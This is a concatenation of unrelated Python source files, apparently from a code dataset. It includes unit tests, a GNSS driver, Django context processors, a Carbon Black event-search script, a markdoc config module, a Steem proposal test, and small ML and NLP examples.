# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
##
# Sardana is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
##
# You should have received a copy of the GNU Lesser General Public License
# along with Sardana. If not, see <http://www.gnu.org/licenses/>.
##
##############################################################################
from unittest import TestCase
from sardana.sardanabuffer import SardanaBuffer
class TestPersistentBuffer(TestCase):
"""Unit tests for Buffer class"""
def setUp(self):
self.buffer = SardanaBuffer(persistent=True)
self.buffer.extend([1, 2, 3])
def test_extend(self):
"""Test extend method with a simple case of a list."""
chunk = [4, 5, 6]
self.buffer.extend(chunk)
self.assertEqual(self.buffer.get_value(0), 1)
self.assertEqual(self.buffer.get_value(5), 6)
self.assertEqual(len(self.buffer), 6)
self.assertEqual(len(self.buffer.last_chunk), 3)
def test_append(self):
"""Test if append correctly fills the last_chunk as well as permanently
adds the value to the buffer.
"""
self.buffer.append(1)
self.assertEqual(len(self.buffer), 4)
self.assertEqual(len(self.buffer.last_chunk), 1)
|
the-stack_0_19924 | from modules.file.Extension import Extension
def test_check_arguments():
ext = Extension()
ext.args = ['', 'db', 'sqlite', 'sqlite3']
assert ext.check()
assert ext.check_arguments()
ext.args = None
try:
ext.check_arguments()
except SystemExit:
assert True
def test_dict_values():
ext = Extension()
ext.args = ['', 'db']
assert len(ext.description()) > 0
assert ext.is_filter_files()
assert not ext.is_collect_data()
assert not ext.is_extract_data()
def test_filter_files():
ext = Extension()
ext.args = ['']
files = [
'./tests/modules/file/extension_mocks/database.sqlite',
'./tests/modules/file/extension_mocks/database2.db',
'./tests/modules/file/extension_mocks/noextfile',
'./tests/modules/file/extension_mocks/some.jpg'
]
ext.files = files
ext.do_filter_files()
assert len(ext.files) == 1
ext.files = files
ext.args = ['', 'db', 'jpg']
ext.do_filter_files()
assert len(ext.files) == 3
|
the-stack_0_19926 | from machine import Timer
import time
import gc
import binascii
import pycom
class L76GNSS:
GPS_I2CADDR = const(0x10)
def __init__(self, pytrack=None, sda='P22', scl='P21', timeout=None):
if pytrack is not None:
self.i2c = pytrack.i2c
else:
from machine import I2C
self.i2c = I2C(0, mode=I2C.MASTER, pins=(sda, scl))
self.chrono = Timer.Chrono()
self.timeout = timeout
self.timeout_status = True
self.reg = bytearray(1)
self.i2c.writeto(GPS_I2CADDR, self.reg)
def _read(self):
self.reg = self.i2c.readfrom(GPS_I2CADDR, 128) #Changed from 64 to 128 - I2C L76 says it can read till 255 bytes
return self.reg
def _convert_coords(self, gngll_s):
lat = gngll_s[1]
lat_d = (float(lat) // 100) + ((float(lat) % 100) / 60)
lon = gngll_s[3]
lon_d = (float(lon) // 100) + ((float(lon) % 100) / 60)
if gngll_s[2] == 'S':
lat_d *= -1
if gngll_s[4] == 'W':
lon_d *= -1
return(lat_d, lon_d)
#diff indexes from original - Using GGA sentence
def _convert_coords1(self, gngga_s):
lat = gngga_s[2]
lat_d = (float(lat) // 100) + ((float(lat) % 100) / 60)
lon = gngga_s[4]
lon_d = (float(lon) // 100) + ((float(lon) % 100) / 60)
if gngga_s[3] == 'S':
lat_d *= -1
if gngga_s[5] == 'W':
lon_d *= -1
return(lat_d, lon_d)
def _get_time(self, gngga_s):
gps_time = gngga_s[1]
return(gps_time)
def _get_altitude(self, gngga_s):
gps_altitude = gngga_s[9]
return(gps_altitude)
def _get_satellites(self, gngga_s):
num_satellites = gngga_s[7]
return(num_satellites)
def _fix_quality(self, gngga_s):
valid = gngga_s[6]
if valid == '1':
return True
else:
return False
#Using RMC sentence
def _get_time_rmc(self, gnrmc_s):
gps_time = gnrmc_s[1]
return(gps_time)
def _data_valid_rmc(self, gnrmc_s):
valid = gnrmc_s[2]
if valid == 'A':
return True
else:
return False
def _get_date_rmc(self, gnrmc_s):
gps_date = gnrmc_s[9]
return(gps_date)
def coordinates(self, debug=False):
lat_d, lon_d, debug_timeout = None, None, False
if self.timeout is not None:
self.chrono.reset()
self.chrono.start()
nmea = b''
while True:
if self.timeout is not None and self.chrono.read() >= self.timeout:
self.chrono.stop()
chrono_timeout = self.chrono.read()
self.chrono.reset()
self.timeout_status = False
debug_timeout = True
if not self.timeout_status:
gc.collect()
break
nmea += self._read().lstrip(b'\n\n').rstrip(b'\n\n')
gngll_idx = nmea.find(b'GNGLL')
if gngll_idx >= 0:
gngll = nmea[gngll_idx:]
e_idx = gngll.find(b'\r\n')
if e_idx >= 0:
try:
gngll = gngll[:e_idx].decode('ascii')
gngll_s = gngll.split(',')
lat_d, lon_d = self._convert_coords(gngll_s)
except Exception:
pass
finally:
nmea = nmea[(gngll_idx + e_idx):]
gc.collect()
break
else:
gc.collect()
if len(nmea) > 410: # i suppose it can be safely changed to 82, which is longest NMEA frame
nmea = nmea[-5:] # $GNGL without last L
time.sleep(0.1)
self.timeout_status = True
if debug and debug_timeout:
print('GPS timed out after %f seconds' % (chrono_timeout))
return(None, None)
else:
return(lat_d, lon_d)
#TEST functions
#Parser for GPGGA
def coordinates1(self, debug=False):
lat_d, lon_d, gps_time, valid, gps_altitude, num_satellites, debug_timeout = None, None, None, None, None, False, False
if self.timeout is not None:
self.chrono.reset()
self.chrono.start()
nmea = b''
while True:
if self.timeout is not None and self.chrono.read() >= self.timeout:
self.chrono.stop()
chrono_timeout = self.chrono.read()
self.chrono.reset()
self.timeout_status = False
debug_timeout = True
if not self.timeout_status:
gc.collect()
break
nmea += self._read().lstrip(b'\n\n').rstrip(b'\n\n')
gpgga_idx = nmea.find(b'GPGGA')
if gpgga_idx >= 0:
gpgga = nmea[gpgga_idx:]
gpgga_e_idx = gpgga.find(b'\r\n')
if gpgga_e_idx >= 0:
try:
gpgga = gpgga[:gpgga_e_idx].decode('ascii')
gpgga_s = gpgga.split(',')
lat_d, lon_d = self._convert_coords1(gpgga_s)
gps_time = self._get_time(gpgga_s)
valid = self._fix_quality(gpgga_s)
gps_altitude = self._get_altitude(gpgga_s)
num_satellites = self._get_satellites(gpgga_s)
except Exception:
pass
finally:
nmea = nmea[(gpgga_idx + gpgga_e_idx):]
gc.collect()
break
else:
gc.collect()
if len(nmea) > 410: # i suppose it can be safely changed to 82, which is longest NMEA frame
nmea = nmea[-5:] # $GNGL without last L
time.sleep(0.1)
self.timeout_status = True
if debug and debug_timeout:
print('GPS timed out after %f seconds' % (chrono_timeout))
return(None, None, None, None, False, None)
else:
return(lat_d, lon_d, gps_time, gps_altitude, valid, num_satellites)
def stop(self,pytrack):
ANSELC_ADDR = const(0x18E)
pytrack.poke_memory(ANSELC_ADDR, ~(1 << 7))
#parser for UTC time and date >> Reads GPRMC
def get_datetime(self, debug=True):
lat_d, lon_d, gps_time, valid, gps_date, rmc_idx, debug_timeout = None, None, None, None, None, -1, False
if self.timeout is not None:
self.chrono.reset()
self.chrono.start()
nmea = b''
while True:
if self.timeout is not None and self.chrono.read() >= self.timeout:
self.chrono.stop()
chrono_timeout = self.chrono.read()
self.chrono.reset()
self.timeout_status = False
debug_timeout = True
if not self.timeout_status:
gc.collect()
break
nmea += self._read().lstrip(b'\n\n').rstrip(b'\n\n')
#Since or spg or glonass could give date see which one is present -SEE page 10 GNSS protocol
#GPS only - GPRMC GPGGA
#Glonass only - GNRMC GPGGA
#GPS+GLON - GNRMC GPGGA
#No station - GPRMC GPGGA
gprmc_idx = nmea.find(b'GPRMC')
gnrmc_idx = nmea.find(b'GNRMC')
if gprmc_idx >= 0:
rmc_idx = gprmc_idx
if gnrmc_idx >= 0:
rmc_idx = gnrmc_idx
if rmc_idx >= 0:
rmc = nmea[rmc_idx:]
rmc_e_idx = rmc.find(b'\r\n')
if rmc_e_idx >= 0:
print(nmea)
try:
rmc = rmc[:rmc_e_idx].decode('ascii')
rmc_s = rmc.split(',')
lat_d, lon_d = self._convert_coords1(rmc_s[1:])
gps_time = self._get_time_rmc(rmc_s)
valid = self._data_valid_rmc(rmc_s)
gps_date = self._get_date_rmc(rmc_s)
except Exception:
pass
finally:
nmea = nmea[(rmc_idx + rmc_e_idx):]
gc.collect()
break
else:
gc.collect()
if len(nmea) > 512: # i suppose it can be safely changed to 82, which is longest NMEA frame --CHANGED to 512
nmea = nmea[-5:] # $GNGL without last L
time.sleep(0.1)
self.timeout_status = True
if debug and debug_timeout:
print('GPS timed out after %f seconds' % (chrono_timeout))
return(None, None, None, False, None)
else:
return(lat_d, lon_d, gps_time, valid, gps_date)
|
the-stack_0_19927 | # add global variable for report server or not to all templates so we can hide
# elements that aren't wanted on the report server
from django.conf import settings
def report_server_check(request):
return {'report_server': settings.REPORT_SERVER,
'offline_mode': settings.OFFLINE_MODE,
'non_ldap': settings.NON_LDAP}
def google_analytics(request):
"""
Use the variables returned in this function to render Google Analytics
Tracking Code template.
"""
ga_prop_id = getattr(settings, 'GOOGLE_ANALYTICS_PROPERTY_ID', False)
ga_domain = getattr(settings, 'GOOGLE_ANALYTICS_DOMAIN', False)
if not settings.DEBUG and ga_prop_id and ga_domain:
return {
'GOOGLE_ANALYTICS_PROPERTY_ID': ga_prop_id,
'GOOGLE_ANALYTICS_DOMAIN': ga_domain,
}
return {}
|
the-stack_0_19928 | # Take in user input to search across existing enriched events.
# Prints device info
# Next, print 5 most recent alert IDs/info
from cbc_sdk import CBCloudAPI
from cbc_sdk.platform import Device
from cbc_sdk.endpoint_standard import EnrichedEvent
#Start by taking input to select a device.
keyword = ""
keyword = input("Please enter a TTP, or other keyword to begin: ")
cbc_api = CBCloudAPI(profile='default')
enriched_search = cbc_api.select(EnrichedEvent)
# Get keyword to filter enriched events
while keyword == "":
keyword = input("Save the blank searches for the console :) Enter a TTP or other keyword to begin: ")
enriched_search = enriched_search.where(keyword)
if len(enriched_search) == 0:
print("Welp, that one came up empty. Try again.")
exit()
active_devices = []
# get list of devices that reported enriched events
for event in enriched_search:
if event['device_name'] not in active_devices:
active_devices.append(event['device_name'])
print("## Devices with matching enriched events ##")
for dev in active_devices:
print("Device name: {}".format(str(dev)))
# Print list of devices with reported evnts
print("\n## Sample of matching enriched events ##\n")
if len(enriched_search) == 1:
print("{} results returned".format(len(enriched_search)))
if len(enriched_search) >= 2:
print("{} results returned".format(len(enriched_search)))
sample_result_count = 0
for event in enriched_search:
while sample_result_count <= 1:
print("\n")
print(type(event))
print(str(event))
sample_result_count = sample_result_count + 1
print(sample_result_count)
|
the-stack_0_19929 | # -*- coding: utf-8 -*-
"""Utilities for working with Markdoc configurations."""
import copy
import os
import os.path as p
import markdown
import yaml
import markdoc.exc
class ConfigNotFound(markdoc.exc.AbortError):
"""The configuration file was not found."""
pass
class ConfigMeta(type):
def __new__(mcls, name, bases, attrs):
cls = type.__new__(mcls, name, bases, attrs)
cls._defaults = {}
cls._func_defaults = {}
return cls
def register_default(cls, key, default_value):
"""Register a default value for a given key."""
cls._defaults[key] = default_value
def register_func_default(cls, key, function):
"""Register a callable as a functional default for a key."""
cls._func_defaults[key] = function
def func_default_for(cls, key):
"""Decorator to define a functional default for a given key."""
return lambda function: [cls.register_func_default(key, function),
function][1]
class Config(dict):
"""
A dictionary which represents a single wiki's Markdoc configuration.
When instantiating this dictionary, if you aren't using an actual
configuration file, just remember to set `config['meta.root']` to the
wiki root; you can use `None` as the value for config_file. For example:
# With a filename:
config = Config('filename.yaml', {...})
# Without a filename:
config = Config(None, {'meta': {'root': '/path/to/wiki/root/'}, ...})
"""
__metaclass__ = ConfigMeta
def __init__(self, config_file, config):
super(Config, self).__init__(flatten(config))
self['meta.config-file'] = config_file
self['meta.root'] = p.dirname(config_file)
def __getitem__(self, key):
try:
return dict.__getitem__(self, key)
except KeyError:
if key in self._defaults:
self[key] = copy.copy(self._defaults[key])
elif key in self._func_defaults:
self[key] = self._func_defaults[key](self, key)
else:
raise
return dict.__getitem__(self, key)
def __delitem__(self, key):
if (key not in self):
return # fail silently.
return dict.__delitem__(self, key)
@classmethod
def for_directory(cls, directory=None):
"""
Get the configuration from the 'markdoc.yaml' file in a directory.
If you do not specify a directory, this method will use the current
working directory.
"""
if directory is None:
directory = os.getcwd()
if p.exists(p.join(directory, 'markdoc.yaml')):
return cls.for_file(p.join(directory, 'markdoc.yaml'))
elif p.exists(p.join(directory, '.markdoc.yaml')):
return cls.for_file(p.join(directory, '.markdoc.yaml'))
raise ConfigNotFound("A markdoc configuration could not be found.")
@classmethod
def for_file(cls, filename):
"""Get the configuration from a given YAML file."""
if not p.exists(filename):
relpath = p.relpath(p.dirname(filename), start=os.getcwd())
basename = p.basename(filename)
if relpath == '.':
raise ConfigNotFound("%s was not found in the current directory" % basename)
raise ConfigNotFound("%s was not found in %s" % (basename, relpath))
fp = open(filename)
try:
config = yaml.load(fp) or {}
finally:
fp.close()
return cls(filename, config)
def flatten(dictionary, prefix=''):
"""
Flatten nested dictionaries into dotted keys.
>>> d = {
... 'a': {
... 'b': 1,
... 'c': {
... 'd': 2,
... 'e': {
... 'f': 3
... }
... }
... },
... 'g': 4,
... }
>>> sorted(flatten(d).items())
[('a.b', 1), ('a.c.d', 2), ('a.c.e.f', 3), ('g', 4)]
"""
for key in dictionary.keys():
value = dictionary.pop(key)
if not isinstance(value, dict):
dictionary[prefix + key] = value
else:
for key2 in value.keys():
value2 = value.pop(key2)
if not isinstance(value2, dict):
dictionary[prefix + key + '.' + key2] = value2
else:
dictionary.update(flatten(value2,
prefix=(prefix + key + '.' + key2 + '.')))
return dictionary
|
the-stack_0_19930 | import grpc
from concurrent import futures
import time
from pkg.api.python import api_pb2_grpc
from pkg.suggestion.bayesian_service import BayesianService
from pkg.suggestion.types import DEFAULT_PORT
_ONE_DAY_IN_SECONDS = 60 * 60 * 24
def serve():
server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
api_pb2_grpc.add_SuggestionServicer_to_server(BayesianService(), server)
server.add_insecure_port(DEFAULT_PORT)
print("Listening...")
server.start()
try:
while True:
time.sleep(_ONE_DAY_IN_SECONDS)
except KeyboardInterrupt:
server.stop(0)
if __name__ == "__main__":
serve()
|
the-stack_0_19932 | #!/usr/bin/python3
from uuid import uuid4
from time import sleep
import logging
import sys
import steem_utils.steem_runner
import steem_utils.steem_tools
import test_utils
LOG_LEVEL = logging.INFO
LOG_FORMAT = "%(asctime)-15s - %(name)s - %(levelname)s - %(message)s"
MAIN_LOG_PATH = "./sps_proposal_payment_008.log"
MODULE_NAME = "SPS-Tester-via-steempy"
logger = logging.getLogger(MODULE_NAME)
logger.setLevel(LOG_LEVEL)
ch = logging.StreamHandler(sys.stdout)
ch.setLevel(LOG_LEVEL)
ch.setFormatter(logging.Formatter(LOG_FORMAT))
fh = logging.FileHandler(MAIN_LOG_PATH)
fh.setLevel(LOG_LEVEL)
fh.setFormatter(logging.Formatter(LOG_FORMAT))
if not logger.hasHandlers():
logger.addHandler(ch)
logger.addHandler(fh)
try:
from steem import Steem
except Exception as ex:
logger.error("SteemPy library is not installed.")
sys.exit(1)
# Voter proxy test
# 1. create few proposals - in this scenario proposals have the same starting and ending dates
# 2. vote on them to show differences in asset distribution, one voter sets the other as the proxy
# 3. wait for proposal payment phase
# 4. verify (using account history and by checking regular account balance) that given accounts have been correctly paid.
def vote_proposals(node, accounts):
logger.info("Voting proposals...")
idx = 0
for acnt in accounts:
proposal_set = [idx]
logger.info("Account {} voted for proposals: {}".format(acnt["name"], ",".join(str(x) for x in proposal_set)))
node.commit.update_proposal_votes(acnt["name"], proposal_set, True)
idx += 1
steem_utils.steem_tools.wait_for_blocks_produced(5, node.url)
if __name__ == '__main__':
logger.info("Performing SPS tests")
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("creator", help = "Account to create test accounts with")
parser.add_argument("treasury", help = "Treasury account")
parser.add_argument("wif", help="Private key for creator account")
parser.add_argument("--node-url", dest="node_url", default="http://127.0.0.1:8090", help="Url of working steem node")
parser.add_argument("--run-steemd", dest="steemd_path", help = "Path to steemd executable. Warning: using this option will erase contents of selected steemd working directory.")
parser.add_argument("--working_dir", dest="steemd_working_dir", default="/tmp/steemd-data/", help = "Path to steemd working directory")
parser.add_argument("--config_path", dest="steemd_config_path", default="./steem_utils/resources/config.ini.in",help = "Path to source config.ini file")
parser.add_argument("--no-erase-proposal", action='store_false', dest = "no_erase_proposal", help = "Do not erase proposal created with this test")
args = parser.parse_args()
node = None
if args.steemd_path:
logger.info("Running steemd via {} in {} with config {}".format(args.steemd_path,
args.steemd_working_dir,
args.steemd_config_path)
)
node = steem_utils.steem_runner.SteemNode(
args.steemd_path,
args.steemd_working_dir,
args.steemd_config_path
)
node_url = args.node_url
wif = args.wif
if len(wif) == 0:
logger.error("Private-key is not set in config.ini")
sys.exit(1)
logger.info("Using node at: {}".format(node_url))
logger.info("Using private-key: {}".format(wif))
accounts = [
# place accounts here in the format: {'name' : name, 'private_key' : private-key, 'public_key' : public-key}
]
if not accounts:
logger.error("Accounts array is empty, please add accounts in a form {\"name\" : name, \"private_key\" : private_key, \"public_key\" : public_key}")
sys.exit(1)
keys = [wif]
for account in accounts:
keys.append(account["private_key"])
if node is not None:
node.run_steem_node(["--enable-stale-production"])
try:
if node is None or node.is_running():
node_client = Steem(nodes = [node_url], no_broadcast = False,
keys = keys
)
# create accounts
test_utils.create_accounts(node_client, args.creator, accounts)
# tranfer to vesting
test_utils.transfer_to_vesting(node_client, args.creator, accounts, "300.000",
"TESTS"
)
# transfer assets to accounts
test_utils.transfer_assets_to_accounts(node_client, args.creator, accounts,
"400.000", "TESTS"
)
test_utils.transfer_assets_to_accounts(node_client, args.creator, accounts,
"400.000", "TBD"
)
logger.info("Balances for accounts after initial transfer")
test_utils.print_balance(node_client, accounts)
# transfer assets to treasury
test_utils.transfer_assets_to_treasury(node_client, args.creator, args.treasury,
"999950.000", "TESTS"
)
test_utils.transfer_assets_to_treasury(node_client, args.creator, args.treasury,
"999950.000", "TBD"
)
test_utils.print_balance(node_client, [{'name' : args.treasury}])
# create post for valid permlinks
test_utils.create_posts(node_client, accounts)
now = node_client.get_dynamic_global_properties().get('time', None)
if now is None:
raise ValueError("Head time is None")
now = test_utils.date_from_iso(now)
proposal_data = [
['tester001', 1 + 0, 4, '24.000 TBD'], # starts 1 day from now and lasts 3 day
['tester002', 1 + 0, 4, '24.000 TBD'], # starts 1 days from now and lasts 3 day
['tester003', 1 + 0, 4, '24.000 TBD'], # starts 1 days from now and lasts 3 day
['tester004', 1 + 0, 4, '24.000 TBD'], # starts 1 day from now and lasts 3 days
]
proposals = [
# pace proposals here in the format: {'creator' : creator, 'receiver' : receiver, 'start_date' : start-date, 'end_date' : end_date}
]
for pd in proposal_data:
start_date, end_date = test_utils.get_start_and_end_date(now, pd[1], pd[2])
proposal = {'creator' : pd[0], 'receiver' : pd[0], 'start_date' : start_date, 'end_date' : end_date, 'daily_pay' : pd[3]}
proposals.append(proposal)
import datetime
test_start_date = now + datetime.timedelta(days = 1)
test_start_date_iso = test_utils.date_to_iso(test_start_date)
test_mid_date = test_start_date + datetime.timedelta(days = 3, hours = 1)
test_end_date = test_start_date + datetime.timedelta(days = 5, hours = 1)
test_end_date_iso = test_utils.date_to_iso(test_end_date)
test_utils.create_proposals(node_client, proposals)
# list proposals with inactive status, it shoud be list of pairs id:total_votes
test_utils.list_proposals(node_client, test_start_date_iso, "inactive")
# tester01 sets tester02 as its proxy
logger.info("Setting tester002 as a proxy of tester001...")
node_client.commit.account_witness_proxy(proxy='tester002', account='tester001')
# each account is voting on proposal
vote_proposals(node_client, accounts)
# list proposals with inactive status, it shoud be list of pairs id:total_votes
votes = test_utils.list_proposals(node_client, test_start_date_iso, "inactive")
for vote in votes:
#should be 0 for all
assert vote == 0, "All votes should be equal to 0"
logger.info("Balances for accounts after creating proposals")
test_balances = [
'390.000 TBD',
'390.000 TBD',
'390.000 TBD',
'390.000 TBD',
]
balances = test_utils.print_balance(node_client, accounts)
for idx in range(0, len(test_balances)):
assert balances[idx] == test_balances[idx], "Balances dont match {} != {}".format(balances[idx], test_balances[idx])
test_utils.print_balance(node_client, [{'name' : args.treasury}])
# move forward in time to see if proposals are paid
# moving is made in 1h increments at a time, after each
# increment balance is printed
logger.info("Moving to date: {}".format(test_start_date_iso))
node_client.debug_generate_blocks_until(wif, test_start_date_iso, False)
current_date = test_start_date
while current_date < test_end_date:
current_date = current_date + datetime.timedelta(hours = 1)
current_date_iso = test_utils.date_to_iso(current_date)
logger.info("Moving to date: {}".format(current_date_iso))
node_client.debug_generate_blocks_until(wif, current_date_iso, False)
logger.info("Balances for accounts at time: {}".format(current_date_iso))
test_utils.print_balance(node_client, accounts)
test_utils.print_balance(node_client, [{'name' : args.treasury}])
votes = test_utils.list_proposals(node_client, test_start_date_iso, "active")
votes = test_utils.list_proposals(node_client, test_start_date_iso, "expired")
votes = test_utils.list_proposals(node_client, test_start_date_iso, "all")
# move additional hour to ensure that all proposals ended
logger.info("Moving to date: {}".format(test_end_date_iso))
node_client.debug_generate_blocks_until(wif, test_end_date_iso, False)
logger.info("Balances for accounts at time: {}".format(test_end_date_iso))
balances = test_utils.print_balance(node_client, accounts)
# it should be '390.000 TBD', '486.000 TBD', '486.000 TBD', '486.000 TBD',
# but because of rounding implementation it is 390.000 TBD,485.808 TBD,485.808 TBD,485.808 TBD
test_balances = [
'390.000 TBD',
'485.808 TBD',
'485.808 TBD',
'485.808 TBD',
]
for idx in range(0, len(test_balances)):
assert balances[idx] == test_balances[idx], "Balances dont match {} != {}".format(balances[idx], test_balances[idx])
test_utils.print_balance(node_client, [{'name' : args.treasury}])
if node is not None:
node.stop_steem_node()
sys.exit(0)
sys.exit(1)
except Exception as ex:
logger.error("Exception: {}".format(ex))
if node is not None:
node.stop_steem_node()
sys.exit(1)
|
the-stack_0_19933 | #!/usr/bin/env python3
"""This is an example to train a task with CMA-ES.
Here it runs CartPole-v1 environment with 100 epoches.
Results:
AverageReturn: 100
RiseTime: epoch 38 (itr 760),
but regression is observed in the course of training.
"""
from garage.experiment import run_experiment
from garage.np.algos import CMAES
from garage.np.baselines import LinearFeatureBaseline
from garage.tf.envs import TfEnv
from garage.tf.experiment import LocalTFRunner
from garage.tf.policies import CategoricalMLPPolicy
from garage.tf.samplers import OnPolicyVectorizedSampler
def run_task(snapshot_config, *_):
"""Train CMA_ES with Cartpole-v1 environment."""
with LocalTFRunner(snapshot_config=snapshot_config) as runner:
env = TfEnv(env_name='CartPole-v1')
policy = CategoricalMLPPolicy(
name='policy', env_spec=env.spec, hidden_sizes=(32, 32))
baseline = LinearFeatureBaseline(env_spec=env.spec)
n_samples = 20
algo = CMAES(
env_spec=env.spec,
policy=policy,
baseline=baseline,
max_path_length=100,
n_samples=n_samples)
runner.setup(algo, env, sampler_cls=OnPolicyVectorizedSampler)
# NOTE: make sure that n_epoch_cycles == n_samples !
runner.train(n_epochs=100, batch_size=1000, n_epoch_cycles=n_samples)
run_experiment(
run_task,
snapshot_mode='last',
seed=1,
)
|
the-stack_0_19934 | #appModules/mirc.py
#A part of NonVisual Desktop Access (NVDA)
#This file is covered by the GNU General Public License.
#See the file COPYING for more details.
#Copyright (C) 2010 James Teh <[email protected]>
"""App module for mIRC
"""
import controlTypes
from NVDAObjects.window import Window, DisplayModelLiveText
from NVDAObjects.IAccessible import StaticText
import appModuleHandler
class Input(Window):
def event_gainFocus(self):
super(Input, self).event_gainFocus()
try:
output = self.parent.parent.lastChild.firstChild
except AttributeError:
output = None
if isinstance(output, DisplayModelLiveText):
output.startMonitoring()
self._output = output
else:
self._output = None
def event_loseFocus(self):
if self._output:
self._output.stopMonitoring()
class AppModule(appModuleHandler.AppModule):
def chooseNVDAObjectOverlayClasses(self, obj, clsList):
if obj.role == controlTypes.Role.WINDOW:
return
if obj.windowClassName == "Static" and obj.windowControlID == 32918:
clsList.remove(StaticText)
clsList.insert(0, DisplayModelLiveText)
elif obj.windowClassName == "RichEdit20W" and obj.windowControlID == 32921:
clsList.insert(0, Input)
|
the-stack_0_19936 | import jiagu
# jiagu.init() # 可手动初始化,也可以动态初始化
text = '厦门明天会不会下雨'
words = jiagu.seg(text) # 分词
print(words)
words = jiagu.cws(text, model="mmseg") # mmseg分词
print(words)
pos = jiagu.pos(words) # 词性标注
print(pos)
ner = jiagu.ner(text) # 命名实体识别
print(ner)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.